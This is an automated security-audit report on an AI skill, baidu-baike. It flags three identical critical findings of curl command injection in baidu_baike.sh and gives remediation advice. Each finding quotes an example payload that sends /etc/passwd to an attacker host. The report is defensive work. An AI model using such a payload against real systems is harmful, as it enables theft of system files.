Security Audit

baidu-baike

github.com/openclaw/skills

AI SkillCommit 13146e6a3d46

CAUTION

Scanned 3 months ago

Critical

Immediate action required

High

Priority fixes suggested

Medium

Best practices review

Low

Acknowledged / Tracked

Trust Assessment

baidu-baike received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.

SkillShield's automated analysis identified 3 findings: 3 critical, 0 high, 0 medium, and 0 low severity. Key findings include Command Injection via Unsanitized User Input in Curl Arguments.

The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 10/100, indicating areas for improvement.

Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.

Layer Breakdown

Manifest Analysis

100%

Static Code Analysis

100%

Dependency Graph

100%

LLM Behavioral Safety

10%

Behavioral Risk Signals

Network Access

3 findings

Filesystem Write

3 findings

Shell Execution

3 findings

Dynamic Code

3 findings

Security Findings3

Severity	Finding	Layer	Location
CRITICAL	Command Injection via Unsanitized User Input in Curl Arguments The `baidu_baike.sh` script constructs `curl` commands by directly interpolating user-provided input (`$TITLE`, `$ID`, `$TOP_K`) into the URL string without proper URL encoding or shell escaping. This allows an attacker to inject arbitrary `curl` command-line options or manipulate URL parameters. For example, an attacker could inject `--output /dev/null` to prevent results from being returned, or `--output /tmp/exfil.txt --data-binary @/etc/passwd http://attacker.com/collect` to exfiltrate sensitive files. This is a direct command injection vulnerability that can lead to data exfiltration, arbitrary file writes, or other malicious actions. All user-provided variables (`$TITLE`, `$ID`, `$TOP_K`) must be properly URL-encoded before being included in the `curl` command's URL argument. For shell scripts, this can be done using `urlencode` functions or by carefully constructing the URL with `printf %q` for shell safety and then encoding the parameter values. A robust solution would involve using a dedicated HTTP client library that handles URL encoding automatically.	LLM	baidu_baike.sh:22
CRITICAL	Command Injection via Unsanitized User Input in Curl Arguments The `baidu_baike.sh` script constructs `curl` commands by directly interpolating user-provided input (`$TITLE`, `$ID`, `$TOP_K`) into the URL string without proper URL encoding or shell escaping. This allows an attacker to inject arbitrary `curl` command-line options or manipulate URL parameters. For example, an attacker could inject `--output /dev/null` to prevent results from being returned, or `--output /tmp/exfil.txt --data-binary @/etc/passwd http://attacker.com/collect` to exfiltrate sensitive files. This is a direct command injection vulnerability that can lead to data exfiltration, arbitrary file writes, or other malicious actions. All user-provided variables (`$TITLE`, `$ID`, `$TOP_K`) must be properly URL-encoded before being included in the `curl` command's URL argument. For shell scripts, this can be done using `urlencode` functions or by carefully constructing the URL with `printf %q` for shell safety and then encoding the parameter values. A robust solution would involve using a dedicated HTTP client library that handles URL encoding automatically.	LLM	baidu_baike.sh:33
CRITICAL	Command Injection via Unsanitized User Input in Curl Arguments The `baidu_baike.sh` script constructs `curl` commands by directly interpolating user-provided input (`$TITLE`, `$ID`, `$TOP_K`) into the URL string without proper URL encoding or shell escaping. This allows an attacker to inject arbitrary `curl` command-line options or manipulate URL parameters. For example, an attacker could inject `--output /dev/null` to prevent results from being returned, or `--output /tmp/exfil.txt --data-binary @/etc/passwd http://attacker.com/collect` to exfiltrate sensitive files. This is a direct command injection vulnerability that can lead to data exfiltration, arbitrary file writes, or other malicious actions. All user-provided variables (`$TITLE`, `$ID`, `$TOP_K`) must be properly URL-encoded before being included in the `curl` command's URL argument. For shell scripts, this can be done using `urlencode` functions or by carefully constructing the URL with `printf %q` for shell safety and then encoding the parameter values. A robust solution would involve using a dedicated HTTP client library that handles URL encoding automatically.	LLM	baidu_baike.sh:45

Scan History

Embed Code

[![SkillShield](https://skillshield.io/api/v1/badge/43731f4d725413b2.svg)](https://skillshield.io/report/43731f4d725413b2)